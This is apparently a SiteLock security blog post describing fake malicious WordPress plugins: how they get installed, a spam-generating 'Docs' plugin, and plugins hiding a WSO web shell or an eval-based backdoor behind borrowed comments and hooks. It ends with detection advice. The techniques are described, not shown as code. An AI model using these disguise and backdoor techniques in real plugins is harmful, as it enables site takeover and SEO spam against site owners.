Fake, malicious WordPress plugins are not new. The proliferation of fake plugins generating spam files though has blossomed in recent months. We’ve seen blatant rip offs of existing plugins, fake plugins that are one letter away from their legitimate counterpart, and even a created-from-scratch, malware-serving plugin using a ripped version of the WordPress.org plugins site.
This week we’ll discuss how fake plugins get on to WordPress sites, analyze a well known fake plugin to provide a sense of what they can do, look at a non-exhaustive list of fake plugins and a couple of interesting features, and discuss ways to avoid being victimized by fake plugins.
Unfortunately there’s no one concrete way fake plugins end up on WordPress sites. We can however discuss a few common ways they are “installed.” And the first method is just that–a fake plugin is installed by the site owner.
Malicious plugin authors are adept and persistent. Bad actors will co-opt existing, usually not well-known plugins, steal the code and post the plugin on any number of third-party WordPress sites. Unsuspecting site owners looking for some capability find the fake, malicious plugin, install it, and the new capability may or may not work. What is likely to work is the malicious code inside the fake plugin.
The most likely way a fake plugin makes it on to a WordPress site is through the compromise of an existing, vulnerable plugin. The Revolution Slider vulnerability was a major and long-lasting battle with compromised WordPress sites and the resultant spam.
Another method fake plugins are installed is an FTP or hosting control panel credentials compromise. A compromised workstation is a password stealing trojan away from transmitting sensitive user names and passwords to bad actors who may take complete control of a site and install any number of types of malware, including fake plugins.
We’ll begin our fake plugin survey with one of the most infamous fake WordPress plugins, the ‘Docs’ plugin. Docs, occasionally docs, is a spam file creator which creates hundreds if not thousands of .dat spam files. It places them in a directory named cache and maps the files with a file called sitemap.html. Here you can see the code that does just that.
Docs.php Code Snippet
And here is a partial directory listing of the generated spam files.
Docs Spam Files
The spam files themselves, in this example, contain links shucking drug rehab.
<li><a href=”http://example.com/recovering-drug-addict-behavior”>Recovering drug addict behavior</a></li>
<li><a href=”http://example.com/recovery-from-pain-killer-addiction”>Recovery from pain killer addiction</a></li>
<li><a href=”http://example.com/drug-rehabilitation-near-me”>Drug rehabilitation near me</a></li>
<li><a href=”http://example.com/pcp-drug-treatment”>Pcp drug treatment</a></li>
<li><a href=”http://example.com/celebrities-in-recovery”>Celebrities in recovery</a></li>
.dat File Snippet
This spam will become an easy source of black hat SEO for the bad actors, boosting other sites’ rankings while hurting the SEO of the infected site — even causing the attacked site to become blacklisted by search engines.
Here is a non-exhaustive list of plugins we’ve seen while dealing with infected WordPress sites.
Sample Listing of Fake WordPress Plugins
A common tactic of fake plugins is to use legitimate comments or code to try to mask their existence. Take wp-amazing-updater for example. Wp-amazing-updater is a fake plugin which is a password protected uploader and more, and it uses the comments from the BNS Add Widget plugin in its main PHP file. Here are the fake plugin’s directory listing and the legitimate comments in the malicious plugin file.
Directory Listing of wp-amazing-updater
Benign Comments in the Malicious wp-amazing-updater.php File
Another fake plugin, theme-check, uses a barely obfuscated shell, the WSO shell, in its included file, db.php. Here is a snippet of the shell’s code.
Snippet of plugins/theme-check/db.php
Some fake plugins are overwhelmingly normal code while others are overwhelmingly malicious. Still others co-opt legitimate parts of a platform, here WordPress, to deliver the functions to exploit a site. The code below is from the ‘research_plugin’ that provides a simple to access backdoor. Function research_plugin(), which is an eval request to run arbitrary commands, is called whenever the theme is initialized through through the add_action hook.
Snippet of ‘research_plugin’
It can be difficult to detect fake, malicious plugins installed on a WordPress site, especially if you don’t know what you’re looking for. The best thing a site owner or developer can do is regularly check the installed plugins through the WordPress admin dashboard, and look through the installation files directly in /wp-content/plugins with an FTP client or hosting control panel. Look for any plugins listed above or any that you do not recognize, and then check wordpress.org/plugins to search for the plugin’s directory name to verify if it’s legitimate.
Also using a security scanner, like SiteLock INFINITY malware scanner, can monitor your site for the malware contained in fake plugins and alert you to the plugins and, in the case of INFINITY, automatically clean the malicious content for you.
The unfortunate happens and your WordPress site is compromised. You recover from the hack through backups or SiteLock’s malware removal service, yet you still feel at unease.
The truth is, once a WordPress site recovers from a compromise, there’s a bit more to do. Taking a few simple, post-compromise steps can help harden your site from future attacks and possibly ease administration. We’ll discuss steps to improve WordPress user security, add preventative security measures, and improve maintenance techniques to aid recovery if the worst happens again.
While cleaning a customer site, the SiteLock SECCON Team detected suspicious code in a WordPress plugin file. The SiteLock Research Team investigated the file and verified the suspicious code and plugin were malicious.
We will discuss the malicious plugin and its payload, and detail what steps should be taken to remove and avoid using malicious plugins.
With the holidays behind us and 2016 underway, it’s time to get serious about threats to your WordPress website. The SiteLock research team has investigated the types of attacks WordPress users can expect this year. Let’s take a look…
That’s right! We’re headed south for WordCamp Miami, February 20 & 21, 2016 at Florida International University. We’ll be there with lots of super swag and can’t wait to meet all the Miami WordPressers. Tickets on sale now! For more information, visit 2016.miami.wordcamp.org, @wordcampmiami and #wcmia.
© Copyright 2017, SiteLock LLC.